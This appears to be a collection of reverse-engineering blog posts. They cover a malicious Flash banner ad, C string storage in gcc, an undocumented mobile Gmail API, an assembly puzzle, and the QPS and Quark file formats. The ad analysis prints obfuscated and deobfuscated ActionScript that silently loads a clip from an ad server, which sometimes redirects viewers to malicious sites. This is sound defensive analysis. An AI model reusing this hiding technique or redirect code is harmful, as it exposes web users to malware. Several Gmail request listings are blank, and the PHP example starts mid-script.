Malicious Banner Ad

We ran into a malicious banner ad yesterday. People would randomly get redirected to a malicious website, which you can imagine is a pretty tough thing to diagnose. It turned out to be a Flash ad. I was able to disassemble the banner to see how it worked. The banner is "protected" and compressed, so hex editing it doesn't show any text.

Using Flare to decompile the actionscript in the swf, I found this snippet of code:

this[(a2.split(' ')).join('')]('m1', this[(a3.split(' ')).join('')]());
_root[(a4.split(' ')).join('')][(a5.split(' ')).join('')]((a6.split(' ')).join(''),(a7.split(' ')).join('')) == (a8.split(' ')).join('') && this.m1[(a0.split(' ')).join('')]((a1.split(' ')).join('') + '&u=' + (new Date()).getTime());

It definitely looks like someone is trying to hide something, but there wasn't anything else in the ActionScript: certainly no getURLs or loadMovies.

I used the excellent swfmill program to convert the swf into xml. The output contains markup of every element in the swf. It was there that I found the source of a2,a3,a4, etc.

<DefineEditText objectID="5" wordWrap="0" multiLine="0" password="0" readOnly="1" autoSize="0" hasLayout="1" notSelectable="0" hasBorder="0" isHTML="0" useOutlines="0" fontRef="4" fontHeight="0" align="2" leftMargin="0" rightMargin="0" indent="0" leading="40" variableName="a0" initialText=" loadMovie">

There are text boxes (11 in all) all over the movie, and they are all padded with hundreds of spaces at the beginning so they appear to be blank.

If you substitute out all splits and joins in the initial actionscript, you get the following:

createEmptyMovieClip('m1', getNextHighestDepth());
_url.substr(0,7)=="http://" &&
m1.loadMovie("http://adtraff.com/statsa.php?campaign=plentyup" + '&u=' + (new Date()).getTime());
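To make the trick concrete, here is a small Python sketch of what the split/join idiom does to one of those padded text fields. The two sample values are stand-ins I made up for illustration (the real fields are padded with hundreds of spaces); only the split-on-space, join-on-nothing step mirrors the ActionScript.

```python
def strip_padding(padded):
    """Mirror the ActionScript idiom (s.split(' ')).join('')."""
    # Splitting on a single space yields empty strings for each run of
    # padding; joining on '' throws all of the spaces away.
    return "".join(padded.split(" "))


# Hypothetical stand-ins for two of the hidden text fields.
a0 = " " * 300 + "loadMovie"
a2 = " " * 300 + "createEmptyMovieClip"

print(strip_padding(a0))
print(strip_padding(a2))
```

Note that the idiom removes every space, not just the leading ones, so it only works for values that contain no spaces themselves.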

So basically, this banner ad looks like a normal banner ad. However, each time you load it, it loads a movie clip from adtraff.com. Most of the time, this movie clip is blank. So you wouldn't notice a thing. However, sometimes the movie clip sent back from adtraff.com contains a getURL() that redirects the user to a malicious webpage like performanceoptimizer.com or malware-scan.com.


char pointer versus char array

There are two basic ways to assign a string literal to a local variable.

char *p = "string";
char a[] = "string";

I was curious to see how gcc handles the two.

In both cases, "string" is put into .rodata. This means that with the first method, you must not modify the contents of "string".

p[3]='o'; // this causes a segfault.

So technically, the first method should be:

const char *p = "string";

With the pointer method, gcc will initialize the variable using the following:

mov dword ptr [ebp-8], pointer_to_string

Calling a function and passing p will result in:

mov eax,[ebp-8]
mov [esp], eax
call function_name

With the array method, however, gcc reserves space for the string on the stack and will initialize the variable like so:

mov eax, [pointer_to_string]
mov [ebp-15h], eax
mov eax, [pointer_to_string+4]
mov [ebp-11h],eax
mov eax,[pointer_to_string+8]
mov [ebp-0dh],eax
movzx eax,byte ptr [pointer_to_string+12]
mov [ebp-9],al

As you can see, it moves the string into the stack 4 bytes at a time. If the string is more than 64 bytes long, then gcc will actually create a call to memcpy:

lea ecx,[ebp-49h]
mov edx, pointer_to_string
mov eax,41h
mov [esp+8],eax
mov [esp+4],edx
mov [esp],ecx
call wrapper_to_memcpy

Regardless of how long the string is, passing the array to a function results in the following:

lea eax,[ebp-15h]
mov [esp],eax
call function_name

Passing the variable around is virtually identical for both array and pointer. However, initializing the array carries a real performance and space penalty: the string is copied onto the stack every time you enter the variable's scope, and it occupies stack space for as long as the variable is live. Only use the array method if you intend to change the string. Use the pointer method otherwise.


Mobile Gmail API

Did you know that Google provides a handy, lightweight API for Gmail? Google's Gmail midlet uses this API.

Mobile Gmail Basics

First thing to note, all responses from the server are in the form of UTF8 string lists. There is a 16 bit word (in network byte order) that represents the length of the string, followed by that many bytes. Then another 16 bit word for the next string, and so on. The response is usually terminated with an empty string (16 bit length is 0).
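Here is a minimal Python sketch of a reader for that string-list format. The function name is my own, and it assumes the first empty string marks the end of the list, which matches the "usually terminated" behaviour described above but would cut the list short if an empty string ever appeared in the middle.

```python
import struct


def read_string_list(payload):
    """Decode a run of 16-bit length-prefixed UTF-8 strings."""
    strings = []
    pos = 0
    while pos + 2 <= len(payload):
        # 16-bit length in network byte order (big-endian).
        (length,) = struct.unpack_from(">H", payload, pos)
        pos += 2
        if length == 0:
            break  # assumed terminator: an empty string
        if pos + length > len(payload):
            raise ValueError("truncated string at offset %d" % pos)
        strings.append(payload[pos:pos + length].decode("utf-8"))
        pos += length
    return strings


sample = b"\x00\x01T" + b"\x00\x02hi" + b"\x00\x00"
print(read_string_list(sample))
```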

Secondly, all communication is done via POST requests to a single URL. This URL is https://mail.google.com/mail/m/12345 where 12345 is a random number, presumably to defeat proxy caches common with mobile phones. Please note that all communication is done over SSL.

Third, all requests to the server must contain the API version. Include "p=1.1" as the very first POST variable.
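Putting the second and third points together, a request could be assembled roughly like this in Python. The helper name and the range of the random number are my own assumptions; the URL prefix and the leading p=1.1 come from the description above. Nothing is sent here, the sketch only builds the URL and the POST body.

```python
import random
from urllib.parse import urlencode


def build_request(variables):
    """Return (url, body) for a list of (name, value) POST variables."""
    # The random suffix range is an assumption; any number should do.
    url = "https://mail.google.com/mail/m/%d" % random.randint(10000, 99999)
    # A list of pairs keeps the order, so p=1.1 is always first.
    body = urlencode([("p", "1.1")] + list(variables))
    return url, body


url, body = build_request([("zym", "l")])
print(url)
print(body)
```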

Logging In

Logging in is rather easy. You send a request to the gmail API with the following POST variables:

zym=l (that's a lowercase L)

That's pretty self explanatory.

The very first string in the server's response will be the Status. This will tell you if you were successful in logging in or not. The server will also set a bunch of cookies. You must save these cookies and send them back from this point on. This is what keeps you "logged in".

If Status is "E", then there was some sort of error.
The strings that follow the Status string are listed below.

CAPTCHA_token (optional)
CAPTCHA_image (optional)

error_type is the type of error. It will be either "C" for CAPTCHA required, or "B" for standard errors. If the error is "C" then CAPTCHA_token and CAPTCHA_image will be present. CAPTCHA_image contains the raw data for the image.

If you get a CAPTCHA required error, have the user fill out the captcha information, and send back the following POST variables:

zym=l (again, lowercase L)

$token is the CAPTCHA_token from the server, $answer is the user's answer.

If the Status is "T" then you were successful in logging in, and the packet that is returned is the Inbox packet.

Inbox Packet

The Inbox packet is marked with a Status of "T". The strings that follow the Status string are listed below.


start_thread is the index for the first message returned. num_threads is the number of threads returned. total_threads is the total number of threads in the inbox. In gmail, at the top you see "1-50 of 513". num_threads would be 50, start_thread would be 0, and total_threads is 513. num_unread is the number of unread messages in your inbox.

threads is an array of strings representing each thread. The strings in each thread are as follows:


is_read is "T" if the message has been read, "F" otherwise. is_starred is "T" if the thread has been starred, "F" otherwise. has_attachments is "T" if the thread has attachments, "F" otherwise. from is a user-friendly version of the participants of the thread, e.g. "Jon, me (5)". subject is the subject line of the thread. time is a user-friendly version of the time, e.g. "11:08 am" or "Jul 27". Finally, url contains the ID number for the thread. It is given as "?th=xxxxxxxxxxx", so you'll want to strip out the "?th=" part.
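As a rough Python sketch, one thread's strings can be turned into something friendlier like so. It assumes the seven strings arrive in the order they are described above, and the function and key names are mine.

```python
def parse_thread(fields):
    """Convert the seven strings of one thread into a dict."""
    # Assumed wire order: same as the field descriptions above.
    is_read, is_starred, has_attachments, sender, subject, when, url = fields
    prefix = "?th="
    return {
        "is_read": is_read == "T",
        "is_starred": is_starred == "T",
        "has_attachments": has_attachments == "T",
        "from": sender,
        "subject": subject,
        "time": when,
        # Strip the "?th=" part to get the bare thread ID.
        "thread_id": url[len(prefix):] if url.startswith(prefix) else url,
    }


thread = parse_thread(["T", "F", "F", "Jon, me (5)", "Lunch?", "11:08 am", "?th=abc123"])
print(thread["thread_id"])
```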

Back to the inbox format for a second. num_labels is the number of labels you have set up. They are followed by an array of label strings. The label strings are pretty simple. They look like so:


label is the label itself. num_unread is the number of unread messages in that label.

Contact List

Now let's look at how to retrieve the contact list. You send a simple request with the following POST variables:

v=cl
pnl=$type

$type is the type of contact list to retrieve. "f" is frequent: an abridged contact list with just the people you frequently mail. "a" is all: the entire contact list. The resulting packet is formatted the same, regardless of which type you request.


num_contacts is obviously the number of contacts in the following contact list. Each contact looks like so:


Pretty simple. More detailed contact information doesn't seem to be available.

Read a Thread

Reading a thread is fairly straightforward. Send a request with the following POST variables:


$thread_id is the id of the thread you wish to pull. Just like the Inbox, the first string is a Status. If it is "C" then you were successful in pulling a thread, if it is "E" then there was an error. The strings following the status string are below.

num_attachments (optional)
attachments[] (optional)

thread_subject is the subject line for the thread. num_messages is the number of messages contained in this thread. This is followed by one or more message_headers. Then the body of the selected message is present. The body is represented by several strings, each starting with a colon ":". Each string represents a full line in the message, minus the line break. If there are attachments in the selected message, then num_attachments is the first string without a leading colon. This is followed by a number of attachment strings.
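Separating the body from whatever follows it is mostly a matter of watching for the leading colon. A minimal Python sketch, assuming you have already consumed everything up to the first body line (the function name is mine):

```python
def split_body(strings):
    """Split off the colon-prefixed body lines from the remaining strings."""
    lines = []
    i = 0
    # Every body line starts with ':'; the first string without one
    # (num_attachments, if present) ends the body.
    while i < len(strings) and strings[i].startswith(":"):
        lines.append(strings[i][1:])
        i += 1
    return "\n".join(lines), strings[i:]


body, rest = split_body([":Hello", ":", ":Bye", "1", "attachment data"])
print(body)
print(rest)
```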

The message_header looks like so.


is_read is "T" if the message has been read, "F" otherwise. is_starred is "T" if the message has been starred, "F" otherwise. has_attachments is "T" if the message has attachments, "F" otherwise. from_friendly is a user-friendly version of the from address. to_friendly is a user-friendly version of the to addresses. date_friendly is a user-friendly version of the message date. from_address is the raw from address. b1 is "b", I'm not sure what this represents. to_address is the raw to address. b2 and b3 are "b", I'm not sure what these represent. I believe b2 might contain cc: addresses, if present. timestamp is the actual timestamp for the message. subject is the subject for the message. url contains the id for the message, in the format "?d=u&n=nnn#m_xxxxxxx". "xxxxxx" is the message id. "nnn" is the message number in the thread. b4 is "b", and I'm not sure what it represents. from_address2 and to_address2 seem to be identical to from_address and to_address.

Each attachment has the following format:


Each of these is fairly self-explanatory.

Changing the selected message in a thread is fairly simple. You take the first part of the message url (the "d=u&n=nnn" part) and pass those variables along with the regular read thread variables. It will return the same packet as above, only with the newly selected message's body.
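The message url is shaped like a query string plus a fragment, so Python's standard URL helpers can pull it apart. This is only a sketch; the function name is mine and the sample url is made up.

```python
from urllib.parse import parse_qsl, urlsplit


def parse_message_url(url):
    """Return (variables, message_id) from a '?d=u&n=nnn#m_xxxx' url."""
    parts = urlsplit(url)
    # The query part holds the variables to pass along (d and n).
    variables = parse_qsl(parts.query)
    fragment = parts.fragment
    # The fragment is "m_" followed by the message id.
    message_id = fragment[2:] if fragment.startswith("m_") else fragment
    return variables, message_id


variables, message_id = parse_message_url("?d=u&n=3#m_abc123")
print(variables, message_id)
```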

Previewing Attachments

As far as I can tell, the gmail mobile API doesn't allow you to download attachments, only to retrieve "previews" of the attachments. To do so, you issue a request with the following POST variables:


$attachment_id is obviously the attachment id number you wish to view. $message_id is the "xxxxxxx" part of "#m_xxxxxx" in the message url. $graphics_mode is either "1" or "0". 1 means you can handle image attachments. 0 means text only. Finally there's the $width and $height which specify the maximum width and height of the device.

The first string is a Status string which will be either 't' for text attachments or 'i' for image attachments.

Let's look at the text attachment first. The strings after the Status are below.


a_mode is "A", not sure if it can be anything else. attachment_id is the id of the attachment. filename is the filename of the attachment. Finally attachment_body is the body of the attachment.

Now let's look at an image attachment.


filename is the filename of the attachment. null_string is the 00 00 empty string, and it is followed by the actual attachment. In this case, attachment_file is not a string: it does not have a length prefix. Instead it is just a big chunk of data that appears after the null_string.

If Google couldn't preview your attachment for some reason or another, it will return a text attachment with the error message in the body.

Mark Thread

Now let's look at how to mark a thread. This means starring a thread, marking it read or unread, archiving it, trashing it, or marking it as spam. You send a request with the following POST variables.


$action is the action to take.
st = Star Thread
xst = Unstar Thread
ur = Mark Unread
rd = Mark Read
ar = Archive Thread
tr = Trash Thread
sp = Mark as Spam

$thread_id is the id of the thread to modify. Yes that is a "t=" and not a "th=". This is important. Finally there's $GMAIL_AT. This should simply be the GMAIL_AT cookie that gmail sent when you logged in.


If you can handle the inbox, you can handle searching. First you POST a request with:

q=$query (for $search_type="q")
cat=$category (for $search_type="cat")
sz=$num_per_page (optional)
st=$start (optional)

$search_type is the type of "search". "q" is for query searches, "cat" is for category searches. Viewing your Drafts Folder is done with a category search.

$query is the search query (it is not present at all for category searches). If you prefix your query with "L:" you can do a label view. For example, if you have a label called "Work" you can view your work folder by doing a "q" search with q=L:Work.

$category is the category to view. This is not present at all for query searches. Possible categories are: "Inbox", "Starred", "Chats", "Sent Mail", "Drafts", "All Mail", "Spam", "Trash".

$sz is the number of messages per page to display. This is optional, defaulting to 50 if not present.

$st is the start offset. For example, if you have $sz=20, then when you want to view the next page of results, you would re-issue the same search command, only setting $st=20 then $st=40, and so on. This is optional, and it will default to 0 if not present.
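Paging through results then looks something like the Python sketch below. It only builds the q, sz and st variables for each page; the search-type variable is left out, and the total would come from total_threads in the first response. The function name is mine.

```python
def search_pages(query, total, page_size=50):
    """Yield the POST variables for each page of a query search."""
    for start in range(0, total, page_size):
        yield [("q", query), ("sz", str(page_size)), ("st", str(start))]


pages = list(search_pages("L:Work", total=45, page_size=20))
for page in pages:
    print(page)
```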

The response from the server for doing any of these searches is identical to the packet you got for the inbox. In fact, you can include any of the above variables when you log in to affect the initial results you get on successful login.

Sending Mail

Finally, we see how to actually send mail. You send a packet with the following POST variables:

attach=$attachment (optional)

$GMAIL_AT is the GMAIL_AT cookie. $to_addresses is the comma-separated list of addresses to send mail to. $cc_addresses contains any carbon copy addresses, and $bcc_addresses contains any blind carbon copy addresses. $subject is the subject line of the email, $body is the body of the email. $attachment contains any attachments, but I haven't figured out the format of the attachment yet.

Working Example

What fun is it without a working example? Here's a simple example in PHP that connects to gmail and prints out the first 10 items of your inbox.



if ($status!='T') die("Error logging in");
readUTF($data); //id
echo "Displaying ".($start+1)." to ".($num_msgs+$start).
" of $total<br />\n";
echo "$num_unread unread messages<br />\n";
echo "<table><tr><th>Flags</th><th>From</th>";
echo "<th>Subject</th><th>When</th></tr>\n";
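for ($i=0;$i<$num_msgs;$i++)
{
  // Per-thread strings, assumed to arrive in the order described above.
  $isread=readUTF($data);
  $isstar=readUTF($data);
  $hasattach=readUTF($data);
  $from=readUTF($data);
  $subject=readUTF($data);
  $time=readUTF($data);
  readUTF($data); //url
  echo "<tr><td>";
  echo ($isread=='T')?"R":"r";
  echo ($isstar=='T')?"*":"_";
  echo ($hasattach=='T')?"A":"a";
  echo "</td><td>$from</td><td>$subject</td>";
  echo "<td>$time</td></tr>\n";
}
echo "</table>\n";
// Assumes num_labels is the next string after the threads.
$numlabels=readUTF($data);
for ($i=0;$i<$numlabels;$i++)
{
  // Each label is its name followed by its unread count.
  $label=readUTF($data);
  $num_unread=readUTF($data);
  echo "$label ($num_unread)<br />\n";
}

// Pops one length-prefixed string off the front of $feed.
function readUTF(&$feed)
{
  $len=unpack('n',substr($feed,0,2)); // 16 bit length, network byte order
  $utf=substr($feed,2,$len[1]);
  $feed=substr($feed,2+$len[1]);
  return $utf;
}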



128-bit programming challenge

Here's my entry for the 128-bit programming challenge. Not a single lookup table in there. The resulting stripped binary is down to exactly 500 bytes.

; nasm -f elf hex.asm
; ld hex.o

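section .text
global _start
_start:
mov ecx,10h             ; 16 bytes = 128 bits
mov esi,hex
mov edi,buffer
lp:
movzx eax,byte [esi]
mov ah,al               ; keep a copy for the high nibble
and al,0fh              ; low nibble
cmp al,0ah
sbb al,69h
das                     ; cmp/sbb/das turns 0-15 into '0'-'9','A'-'F'
mov [edi+1],al
shr ax,12               ; high nibble
cmp al,0ah
sbb al,69h
das
mov [edi],al
mov [edi+2],byte 20h    ; space between bytes
add edi,3
inc esi
loop lp
mov [edi],byte 0ah      ; trailing newline
mov ecx,buffer
mov eax,4               ; sys_write
lp2:
xor ebx,ebx
inc ebx                 ; fd 1 = stdout
mov edx,31h
int 80h
mov eax,1               ; sys_exit
mov ebx,0
int 80h
hex:                    ; the 16 bytes to print, written as instructions
or ecx,edi
adc [edx],eax
popf
jz lp2
pop ebx
fadd dword [ecx+56h]
lds esp,[ebx+56h]
mov al,al
section .bss
buffer resb 31h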


QPS Protocol

The following describes the format of the QPS 3.5 protocol. Earlier versions of QPS are very similar, with only minor packet changes. All communication between the client and the QPS server is done via Messages.

Message from Client to Server.
0000 0002 Session ID
0002 0002 Code
0004 0004 Version (0x003f003f)
0008 0002 Sequence Number
000a 0004 Sub-Data Length
000e 0004 Packet Length
0012 **** Data
**** **** Sub-Data

Just like the Quark file format, everything is stored in Network Byte Order. Packet length is the length of Data + length of Sub-Data. Sequence numbers start at 1 and are incremented for each message sent by the client. Session ID starts at 0, and is initialized by the server upon successful login.
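The client header maps neatly onto a struct format string. Here is a minimal Python sketch; the names are mine, and the only things taken from the layout above are the field sizes, their order, the version constant and the length rule.

```python
import struct

VERSION = 0x003F003F
# Session ID, Code, Version, Sequence Number, Sub-Data Length, Packet Length
CLIENT_HEADER = struct.Struct(">HHIHII")  # big-endian, 0x12 bytes


def pack_message(session_id, code, sequence, data=b"", sub_data=b""):
    """Build a client-to-server message: header, Data, then Sub-Data."""
    header = CLIENT_HEADER.pack(
        session_id, code, VERSION, sequence,
        len(sub_data),              # Sub-Data Length
        len(data) + len(sub_data),  # Packet Length
    )
    return header + data + sub_data


msg = pack_message(session_id=0, code=0x05, sequence=1, data=b"ab", sub_data=b"c")
print(msg.hex())
```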

Message from Server to Client
0000 0004 Version (0x003f003f)
0004 0002 Code
0006 0002 Status
0008 0002 Sequence Number
000a 0004 Flags
000e 0004 Length
0012 **** Data

All server communication is a response to a message from the client. The sequence number can be used to identify which request from the client prompted this response.
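Going the other way, a response header can be unpacked with the same approach. This Python sketch assumes Length counts the Data bytes that follow the header; the names are mine.

```python
import struct
from collections import namedtuple

ServerHeader = namedtuple(
    "ServerHeader", "version code status sequence flags length")
# Version, Code, Status, Sequence Number, Flags, Length
SERVER_HEADER = struct.Struct(">IHHHII")  # big-endian, 0x12 bytes


def unpack_response(packet):
    """Split a server message into its header fields and Data."""
    header = ServerHeader(*SERVER_HEADER.unpack_from(packet, 0))
    start = SERVER_HEADER.size
    # Assumption: Length is the number of Data bytes after the header.
    return header, packet[start:start + header.length]


packet = SERVER_HEADER.pack(0x003F003F, 0, 5, 7, 0x100, 3) + b"abc"
header, data = unpack_response(packet)
print(header, data)
```

Matching header.sequence against the sequence number you sent tells you which request this answers.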

Signon Packet (0x05)
The Signon packet is the first packet sent from the client to the server. It contains the username and password of the client.
0000 0012 Message Header (Code: 0x05)
0012 0001 Username Length
0013 **** Username
**** 0001 Password Length
**** **** Password
**** 0004 0x100

0000 0012 Response Header
0012 0004 Session ID

If the Code is 0, then login was successful. Otherwise, the login failed. The Session ID returned should be used in all future packets sent by the client.
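The Data part of the Signon packet is simple enough to build by hand. A Python sketch, with a function name of my own choosing; the caller supplies the username and password already encoded as bytes, since the text encoding isn't something I can vouch for.

```python
import struct


def signon_data(username, password):
    """Build the Data that follows the message header in a Signon packet."""
    if len(username) > 255 or len(password) > 255:
        raise ValueError("lengths are stored in a single byte")
    return (
        bytes([len(username)]) + username
        + bytes([len(password)]) + password
        + struct.pack(">I", 0x100)  # trailing 4-byte constant
    )


print(signon_data(b"bob", b"pw").hex())
```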

GetHeaders (0x4a)
This packet retrieves a list of headers from the server.
0000 0012 Message Header (Code: 0x4a)

0000 0012 Response Header
0012 0004 Unknown
0016 0004 Number of Header Items
001a 0034 Header Item 0
004e 0034 Header Item 1...

Header Item
0000 0004 Header ID
0004 0004 Data Type
0008 0004 Reserved
000c 0001 Name Length
000d 0027 Name

The Data Types supported are:
0001 String
0002 Time Stamp
0004 Integer
0005 Float
0006 Checkbox
0007 Dropdown

GetPublications (0x66)
This packet asks the server for the list of Publications hosted by the server.
0000 0012 Message Header (Code: 0x66)
0012 0014 All zeroes

0000 0012 Response Header
0012 0008 Unknown
001a 0004 Number of Publications
001e 0001 Publication 0 Name Length
001f **** Publication 0 Name
**** 0004 Publication 0 ID
**** 0001 Publication 1 Name Length
**** **** Publication 1 Name
**** 0004 Publication 1 ID...

If Publication Name Length is even, then there's a 1 byte pad at the end of the
Publication Name.
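The padding rule is easy to get wrong, so here is a Python sketch of walking the publication list. Offsets are relative to the start of the Data (that is, after the 0x12 byte header), and the function names are mine.

```python
import struct


def read_padded_string(buf, pos):
    """Read a 1-byte-length string; return (string, next position)."""
    length = buf[pos]
    end = pos + 1 + length
    name = buf[pos + 1:end]
    if length % 2 == 0:
        end += 1  # even-length names carry a 1 byte pad
    return name, end


def parse_publications(data):
    """Return a list of (publication ID, name) pairs."""
    (count,) = struct.unpack_from(">I", data, 8)  # after 8 unknown bytes
    pos = 12
    publications = []
    for _ in range(count):
        name, pos = read_padded_string(data, pos)
        (pub_id,) = struct.unpack_from(">I", data, pos)
        pos += 4
        publications.append((pub_id, name))
    return publications


sample = (b"\x00" * 8 + struct.pack(">I", 2)
          + b"\x03abc" + struct.pack(">I", 7)
          + b"\x02hi\x00" + struct.pack(">I", 9))
print(parse_publications(sample))
```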

GetStatuses (0x2b)
This call gets all the possible Statuses from the server. Statuses may differ
across publications, which is why the publication is sent with the request.
0000 0012 Message Header (Code: 0x2b)
0012 0001 Publication Length
0013 0043 Publication Name

Why we don't send the ID instead of the Name is a mystery.

0000 0012 Response Header
0012 0008 Unknown
001a 0004 Number of Statuses
001e **** Status 0
**** **** Status 1...

0000 0004 Unknown
0004 0004 Status ID
0008 000e Unknown
0016 0001 Status Length
0017 **** Status Name
**** 0002 Unknown

If Status Length is even, then Status Name has a 1 byte pad at the end of it.

GetRepositories (0x40)
This call returns the repository information (the file share where the story files are actually kept).
0000 0012 Message Header (Code: 0x40)

0000 0012 Response Header
0012 0004 Number of Repositories
0016 **** Repository 0
**** **** Repository 1...

0000 0004 Length of Repository packet
0004 0032 Unknown
0036 0001 Repository Name Length
0037 **** Repository Name
**** 009a Unknown
**** 0002 Key 0
**** 0002 Value 0 Length
**** **** Value 0
**** 0002 Key 1
**** 0002 Value 1 Length
**** **** Value 1... (until Key=0xffff)

If Value Length is odd, then the Value has a 1 byte pad at the end of it.

The Keys are below.

0x09 Mount Info
0x12 Pathname
0x13 Mount Point
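Reading the key/value list comes down to a loop that stops at the 0xffff key. A minimal Python sketch, assuming the terminating key is not followed by a length; the names are mine.

```python
import struct

KEY_NAMES = {0x09: "Mount Info", 0x12: "Pathname", 0x13: "Mount Point"}


def parse_key_values(buf, pos=0):
    """Return ({key: value bytes}, position after the terminator)."""
    pairs = {}
    while True:
        (key,) = struct.unpack_from(">H", buf, pos)
        pos += 2
        if key == 0xFFFF:
            break  # assumed: no length or value follows the terminator
        (length,) = struct.unpack_from(">H", buf, pos)
        pos += 2
        pairs[key] = buf[pos:pos + length]
        pos += length + (length % 2)  # odd-length values carry a 1 byte pad
    return pairs, pos


sample = (struct.pack(">HH", 0x12, 3) + b"/ab" + b"\x00"
          + struct.pack(">HH", 0x13, 2) + b"mp"
          + struct.pack(">H", 0xFFFF))
pairs, end = parse_key_values(sample)
for key, value in pairs.items():
    print(KEY_NAMES.get(key, hex(key)), value)
```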

For Mount Point and Pathname, the Value is pretty simple, it's simply a string.
Mount Info is more complicated.

0000 0002 Unknown
0002 0004 Mount Type
0006 **** Mount Data

Mount Data depends on the Mount Type. There are two common mount types: "cifs" for Samba, and "afpm" for Apple File Share.

0000 000a Unknown
000a **** CIFS Share

0000 000c Unknown
000c 0002 Offset to IP Length (from beginning of Mount Data)
000e 0002 Offset to Share Length (from beginning of Mount Data)
**** 0001 IP Length
**** **** AFP IP
**** 0001 Share Length
**** **** AFP Share

Search (0x14)
The client sends the search criteria to the server to create a new "search session".
0000 0012 Message Header (Code: 0x14)
0012 0004 0x8

This is the first packet that contains sub-data. This is defined below.
0000 0004 Sub Data Length
0004 0004 0x00060006
0008 0004 0xb46dd345
000c 0020 All zeroes
002c 0004 0x2
0030 0004 0xaf7fffff
0034 0004 0x48
0038 0004 Length of Publications
003c 0004 Offset of Publication 0 ID
0040 0004 Queries Length
0044 0004 Offset of Queries
**** 0004 Publication 0 ID
**** 0004 0x0
**** 0004 Publication 1 ID
**** 0004 0x0...
**** **** Queries

0000 0004 Query Length
0004 0004 Header Key
0008 0004 Header Type
000c **** Query Value

Query Value depends on the Header Type

Header Type 6 (Checkbox):
0000 0004 0x2
0004 0004 0x10000
0008 0004 0x1
000c 0004 0x18
0010 0004 0x1
0014 0004 0x1
0018 0004 0x1
001c 0004 Checkbox Value (0 or 1)
0020 0004 0x0

Header Type 7 (Dropdown):
0000 0004 0x0
0004 0004 0x10000
0008 0004 0x1
000c 0004 0x18
0010 0004 0x1
0014 0004 0x1
0018 0004 0x1
001c 0004 Dropdown ID
0020 0004 0x0

The server will return your search ID.

0000 0012 Response Header
0012 0002 Search ID

This Search ID will be used to fetch the results.

SearchCount (0x42)
This message requests the total # of results from the search.
0000 0012 Message Header (Code: 0x42)
0012 0002 Search ID
0014 000e 0
0022 0001 1
0023 0001 0

There is a Sub-Data component attached to this message.
0000 0004 1

The server will respond with the number of stories that match your query.
0000 0012 Response Header
0012 0004 Number of Stories

GetSearchResults (0x43)
This message gets a bunch of search results.
0000 0012 Message Header (Code: 0x43)

The server will respond with the results. If Code is not zero, then the server is
finished answering. If Code is zero, the response contains a list of matching stories.
You should continue to call GetSearchResults until the server is done.
0000 0012 Response Header
0012 0002 Entry 0 Length
0014 **** Entry 0
**** 0002 Entry 1 Length
**** **** Entry 1...

0000 0010 Unknown
0010 0001 File Status
0011 0025 Unknown
0036 0001 Filename Length
0037 **** Filename

If File Status has high-bit set, then the story is checked out by someone.


After doing a search, the client should listen for updates from the server. The
server will send new updates whenever stories get added or removed from
the search results. Updates can be identified because they have a Status of 5.
The message's Flags identify whether the story is being added to or removed from the search results. If Flags & 0x100 is nonzero then the story is being added, otherwise it is being removed.
0000 0012 Response Header
0012 0008 Unknown
001a 0001 Filename Length
001b **** Filename

OpenHeader (0x08)
This message will open the header of a story for reading and editing.
0000 0012 Message Header (Code: 0x08)
0012 0008 0
001a 0001 Filename Length
001b 0100 Filename
011b 0001 2 (for writing)

0000 0012 Response Header
0012 0002 Header ID

ReadHeader (0x09)
This message will fetch the current story header information.
0000 0012 Message Header (Code: 0x09)
0012 0002 Header ID

0000 0012 Response Header
0012 0120 Unknown
0132 0004 Number of Header Items
0136 0014 Header Item 0
014a 0014 Header Item 1...

Header Item
0000 0004 ID
0004 0004 Type
0008 0004 Reserved
000c 0004 Flags
0010 0004 Value

For some Types, Value may reference data in the packet. This data is located at 0x118+Value from the beginning of the current Header Item.

If Flags&0x1000000 then the value is blank. This is important, because the flags may say a field is blank, but the Value might point to data.
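In code, that means checking the blank flag before trusting Value at all. A small Python sketch of reading one 0x14 byte Header Item; the names are mine, and it leaves resolving Value references to the caller.

```python
import struct

BLANK_FLAG = 0x1000000
# ID, Type, Reserved, Flags, Value
HEADER_ITEM = struct.Struct(">IIIII")  # 0x14 bytes


def parse_header_item(buf, pos=0):
    """Decode one Header Item, honouring the blank flag."""
    item_id, item_type, _reserved, flags, value = HEADER_ITEM.unpack_from(buf, pos)
    blank = bool(flags & BLANK_FLAG)
    return {
        "id": item_id,
        "type": item_type,
        "blank": blank,
        # A blank field may still carry a stale Value, so ignore it.
        "value": None if blank else value,
    }


item = parse_header_item(HEADER_ITEM.pack(1, 6, 0, BLANK_FLAG, 0x20))
print(item)
```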

SaveHeader (0x0a)
0000 0012 Message Header (Code: 0x0a)
0012 0002 Header ID

The raw Header should be put into the SubData part of the message.

0000 0012 Response Header

CloseHeader (0x0e)
This message tells the server that we're done with the header.
0000 0012 Message Header (Code: 0x0e)
0012 0002 Header ID

If you made changes to the header, you MUST open the file on disk, and make the same changes to the end of the file. Otherwise, if the QPS server reboots, all changes you made will be undone.

SignOff (0x16)
This message tells the server that we want to sign off.
0000 0012 Message Header (Code: 0x16)
0012 0002 Session ID

0000 0012 Response Header

Close (0x06)
After we've signed off, we need to close the socket or sign back on. If we close the socket, we send this packet before doing so.
0000 0012 Message Header (Code: 0x06)

Quark file format

This is the file format used by Quark Copydesk.

The file is broken into chunks. Each chunk is exactly 256 bytes long. Chunks are identified by their ID number. Chunk 1 starts at position 0, Chunk 2 starts at position 512, and so on. The first chunk in the file contains the header followed by the TOC.

Quark Header:
The first thing in this file is a 26 byte Quark Header.

0000 0004 File Format Version (0x001b001b)
0004 0008 Identifier ("SPIFSPOC")
000c 0004 QPS Header Offset
0010 000a Reserved
The QPS Header Offset points to the QPS Header attached to the end of the file.

Table of Contents:
Immediately after the header is a table of contents. This table lists the positions in the file for all the interesting sections of the file. Each entry is the Chunk ID of the start of the section.

0000 0004 QPS Column
0004 0004 QPS History
0008 0004 Unknown
000c 0004 Unknown
0010 0004 Backup Color
0014 0004 Backup Font
0018 0004 Color
001c 0004 Font
0020 0004 Component
0024 0004 Style
0028 0004 Unknown
002c 0004 Unknown
0030 0004 Component Data

Some of the sections are unknown. The main sections we are interested in are Font, Component, Style, and Component Data.

General Section Format:
Sections are made up of one or more chunks. Each Chunk is formatted as follows.

0000 00fc Chunk Data
00fc 0004 Next Chunk ID

Next Chunk ID will be 0 if this is the last chunk in the section. Otherwise it points to the next chunk that makes up the current section's data.

If the Next Chunk ID is negative, then the chunk it references is a special chunk called a Contiguous Chunk. Negate the Contiguous Chunk's ID to obtain the actual Chunk ID. A Contiguous Chunk looks different than a regular chunk.

0000 0002 Number of Contiguous Chunks
0002 **** Chunk Data
**** 0004 Next Chunk ID

